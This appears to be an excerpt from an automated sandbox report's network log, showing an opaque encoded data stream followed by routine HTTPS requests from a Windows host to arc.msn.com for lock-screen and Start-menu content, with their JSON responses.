                                                                                                                                                                                                            Data Ascii: 3CVHlum2hhCOhC47u9p1MYojTNogeQAe5bCY1cqpP3PYYhzEr/fPFJnFf3ef2G46m2VXnjM5ARSk7dLSwawyc9xjGtDiuIASgYojPL/ZfTmOKEzCIHIJFO25n5aF4zFskD1f5+K3gRSXxTh5r597OMt9CNEmdgUX57aT3NmxOn3YYBPd4b+dFY6MJDS/2HQ4gSZPkGQ5AQCk7dL13LM7NM8rBpbotc9LwY0qP7zbezmMI0HCI3wIGOC+ndDPoDZ
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 74 6d 76 39 38 38 55 6d 63 56 2f 64 35 66 45 66 7a 69 47 5a 56 65 65 4d 7a 6b 42 46 4b 54 74 30 74 72 46 70 6a 5a 2b 31 6d 45 61 30 4f 57 38 6a 78 69 43 69 69 4d 78 73 74 42 38 50 34 49 6b 54 74 55 67 63 67 41 56 35 37 4f 55 6c 6f 58 6a 4d 57 79 51 50 56 2f 32 39 4c 53 44 46 4d 47 61 61 53 37 32 32 48 42 30 30 32 56 44 33 43 35 2b 42 68 58 6e 76 5a 66 53 77 61 59 32 66 4d 4a 74 48 39 48 39 71 34 38 61 68 49 6b 6b 4e 37 4c 5a 64 54 4b 49 49 51 69 65 61 6e 34 65 57 4c 7a 31 76 39 72 4d 69 6a 46 76 6b 48 70 52 7a 36 2b 2b 67 31 50 5a 78 53 59 38 76 4e 42 78 4e 34 30 6d 51 39 55 67 65 41 45 51 36 61 65 52 32 63 53 6e 4e 6e 76 57 59 78 37 5a 36 62 36 47 45 6f 6d 43 5a 33 6e 32 32 47 52 30 30 32 56 6d 31 79 6c 39 52 67 65 71 72 4e 4c 52 78 2b 4e 75 4e 4e 42 76
                                                                                                                                                                                                            Data Ascii: tmv988UmcV/d5fEfziGZVeeMzkBFKTt0trFpjZ+1mEa0OW8jxiCiiMxstB8P4IkTtUgcgAV57OUloXjMWyQPV/29LSDFMGaaS722HB002VD3C5+BhXnvZfSwaY2fMJtH9H9q48ahIkkN7LZdTKIIQiean4eWLz1v9rMijFvkHpRz6++g1PZxSY8vNBxN40mQ9UgeAEQ6aeR2cSnNnvWYx7Z6b6GEomCZ3n22GR002Vm1yl9RgeqrNLRx+NuNNBv
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 37 50 4c 4d 2f 46 50 33 66 75 6e 30 6b 33 68 53 74 50 78 6a 73 30 49 51 37 75 73 6f 4c 52 33 4b 78 32 4f 70 42 6a 58 34 36 38 39 38 38 58 6b 4d 56 2f 5a 2b 53 45 4b 57 66 63 64 52 72 50 5a 47 42 47 44 71 54 74 77 4a 69 4c 73 58 59 73 6b 43 49 63 78 50 32 2f 6a 41 57 43 77 68 6b 4a 6b 63 56 78 4d 70 77 30 64 75 34 74 59 77 73 65 38 36 54 65 77 38 69 74 4f 48 50 47 4a 56 47 57 34 50 6e 58 4b 73 48 4e 5a 77 6a 34 6e 32 52 30 30 32 56 39 30 79 52 33 41 51 37 31 2b 4c 58 4d 78 71 55 68 5a 5a 41 72 58 39 43 76 34 64 39 64 77 59 45 32 64 2b 36 50 4c 6d 2f 65 64 68 2b 41 65 47 5a 49 41 61 53 6a 30 6f 36 5a 37 58 5a 6d 6b 44 31 66 6b 65 79 72 6e 52 57 43 6b 79 52 77 69 4f 46 53 4d 34 30 67 54 38 42 6f 56 77 30 4d 34 2f 58 63 6c 73 54 6a 62 6b 32 51 4c 56 2f 70 6f
                                                                                                                                                                                                            Data Ascii: 7PLM/FP3fun0k3hStPxjs0IQ7usoLR3Kx2OpBjX468988XkMV/Z+SEKWfcdRrPZGBGDqTtwJiLsXYskCIcxP2/jAWCwhkJkcVxMpw0du4tYwse86Tew8itOHPGJVGW4PnXKsHNZwj4n2R002V90yR3AQ71+LXMxqUhZZArX9Cv4d9dwYE2d+6PLm/edh+AeGZIAaSj0o6Z7XZmkD1fkeyrnRWCkyRwiOFSM40gT8BoVw0M4/XclsTjbk2QLV/po
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 50 78 53 4d 6d 39 6f 63 73 5a 74 42 77 47 34 64 36 4b 78 6c 57 2f 66 57 45 6c 70 50 78 65 44 54 43 4a 55 65 57 71 4c 71 64 41 59 65 47 4d 54 54 78 34 55 49 54 68 53 4a 4a 78 6a 70 75 43 56 66 4b 67 37 50 6f 39 62 59 31 65 74 35 69 43 63 65 76 39 38 38 63 77 64 30 65 64 2f 36 66 51 33 72 4c 50 51 69 49 61 6b 77 46 46 75 71 79 68 4d 65 47 68 44 68 7a 30 58 4d 50 77 65 44 32 6f 53 57 67 78 57 6c 33 73 4a 38 6b 5a 73 56 6c 54 4d 46 71 49 56 5a 4b 76 2b 44 42 67 5a 76 78 4b 54 72 4a 4a 51 6d 57 74 2b 76 42 55 35 50 46 66 33 66 78 33 47 34 6d 6a 53 5a 65 30 32 31 48 4f 44 2f 71 73 70 50 41 32 36 34 36 56 64 4e 30 46 65 6a 52 72 49 77 64 6a 34 49 78 4a 76 61 52 50 44 76 4c 66 58 47 51 59 6a 6b 35 56 71 53 74 30 6f 36 4c 6c 6a 56 36 33 6d 49 4a 78 36 4b 65 67 52
                                                                                                                                                                                                            Data Ascii: PxSMm9ocsZtBwG4d6KxlW/fWElpPxeDTCJUeWqLqdAYeGMTTx4UIThSJJxjpuCVfKg7Po9bY1et5iCcev988cwd0ed/6fQ3rLPQiIakwFFuqyhMeGhDhz0XMPweD2oSWgxWl3sJ8kZsVlTMFqIVZKv+DBgZvxKTrJJQmWt+vBU5PFf3fx3G4mjSZe021HOD/qspPA2646VdN0FejRrIwdj4IxJvaRPDvLfXGQYjk5VqSt0o6LljV63mIJx6KegR
                                                                                                                                                                                                            2024-11-21 14:17:13 UTC1369INData Raw: 45 62 58 4a 66 33 54 46 5a 56 43 51 63 6a 6b 72 43 75 4f 6c 6b 5a 54 6e 70 44 74 34 6b 48 70 52 7a 36 2b 76 7a 30 76 53 79 32 63 6c 39 6f 63 38 63 34 67 33 57 74 59 70 62 77 56 66 32 6f 75 2f 78 4d 79 7a 4e 54 62 68 61 42 76 41 2b 72 71 66 46 4c 2b 37 43 69 57 78 7a 33 39 32 72 68 38 4b 34 54 78 36 42 68 62 6a 39 64 79 57 30 2b 4e 75 4e 50 31 33 47 4d 62 73 2b 36 6f 70 77 37 51 78 4e 4c 62 52 65 33 53 55 61 31 47 51 50 44 6c 65 53 36 72 31 67 4a 61 54 34 33 46 36 33 57 51 63 32 4f 79 72 6e 52 57 43 6b 79 52 77 69 4f 46 54 50 34 6f 31 52 63 45 6e 66 52 41 6d 32 70 4b 55 30 38 79 64 43 45 50 42 59 67 2b 55 79 62 71 5a 45 4d 48 4c 5a 79 2f 32 68 7a 77 54 6a 53 42 50 6b 47 51 35 41 6c 69 38 39 62 33 64 79 72 4d 37 5a 64 31 68 43 5a 54 49 76 34 6f 55 77 63 74
                                                                                                                                                                                                            Data Ascii: EbXJf3TFZVCQcjkrCuOlkZTnpDt4kHpRz6+vz0vSy2cl9oc8c4g3WtYpbwVf2ou/xMyzNTbhaBvA+rqfFL+7CiWxz392rh8K4Tx6Bhbj9dyW0+NuNP13GMbs+6opw7QxNLbRe3SUa1GQPDleS6r1gJaT43F63WQc2OyrnRWCkyRwiOFTP4o1RcEnfRAm2pKU08ydCEPBYg+UybqZEMHLZy/2hzwTjSBPkGQ5Ali89b3dyrM7Zd1hCZTIv4oUwct


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.64971820.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC2604OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=38b8ffdc5fae431fa656bce55474b4f3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-338387&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: X9z08fzW0EqxM+zr.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 21575
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: []
                                                                                                                                                                                                            X-ARC-SIG: lLIfefGTpa9j2QWDAgeKtsO2NaTlhdcTSO8hm/pJ2M/MK0r8BUH4IAhEFH9U/1UlkA+wjb16SVzWrMT5AW5hjshB44+vjuYkRaosV/QvOCHUoYNvka4TOdJOWNiuOhY42icfBzwo4xhUg7OdEjnB4D7fLjGpR+LPb7McP2TvkK2UHf9Qkt1E4UpG/wAQGCwtFY/OwCutDIZKrydDXnHVMQqfoLJMwt5p4cjP+zeMBTyeJUYnNPI4SYlVtcdM72UVa2Jq2DQYtCFmTX80hDHC3lzRy0/m/NCA+3Un0N8CRvmOSk6PUP9waQFNQlfsUI7cdbPb2DKJvq/pypfuW2aRDg==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:13 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC15569INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC6006INData Raw: 6e 64 73 63 61 70 65 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 58 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 70 6f 72 74 72 61 69 74 59 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 7d 2c 5c 22 63 6f 70 79 72 69 67 68 74 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 74 79 70 65 5c 22 3a 5c 22 74 65 78 74 5c 22 7d 2c 5c 22 73 68 6f 77 46 65 65 64 62 61 63 6b 5c 22 3a 7b 5c 22 69 73 4f 70 74 69 6f 6e 61 6c 5c 22 3a
                                                                                                                                                                                                            Data Ascii: ndscapeY\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitX\":{\"isOptional\":true,\"type\":\"numeric\"},\"portraitY\":{\"isOptional\":true,\"type\":\"numeric\"},\"copyright\":{\"isOptional\":true,\"type\":\"text\"},\"showFeedback\":{\"isOptional\":


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.64971720.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC2594OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=e8e1edd3aebd456bb192bdfa879b52d0&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-338388&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: X9z08fzW0EqxM+zr.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 3605
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: []
                                                                                                                                                                                                            X-ARC-SIG: Gh+tcRUUsOkuLT8+X6OaOuNFuXBFv3nV8h9oteLBHhBTTbx/kv3+r3ebzNDlFLDKZRI/mNTMcQTWtPaGj+hxHpCzvpX8LSapzzEhBmhoT8DCgrAD0MHgI5YVYkvOZJu7aGiGxh0C9yJYXGR0qJaoO9MryGZuKFLBzmH92EQ6SWhG9GjOOjXzN5LZ36UWKIi9PZpzIREDSzeYEdNFuFnQmYw4NPrrH4MO/6a2GDrMpmQ+rJm/79PZOdbQ7If+5ASKONnErgQGlLyYVNbkwdvCiloOxSQglRUksY11Y6MdErE08R4pHaamrVZ6jhTMS8vnJTy3OvzZNaokQFNS7YQCZQ==
                                                                                                                                                                                                            Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:13 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC3605INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63
                                                                                                                                                                                                            Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.64971620.223.35.26443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC2587OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141710Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=7d667f6e3a1d4c35ab3cf44b3e8a1285&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-280815&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED]
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6
                                                                                                                                                                                                            X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            MS-CV: X9z08fzW0EqxM+zr.0
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0
                                                                                                                                                                                                            Host: arc.msn.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:14 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Length: 2939
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}]
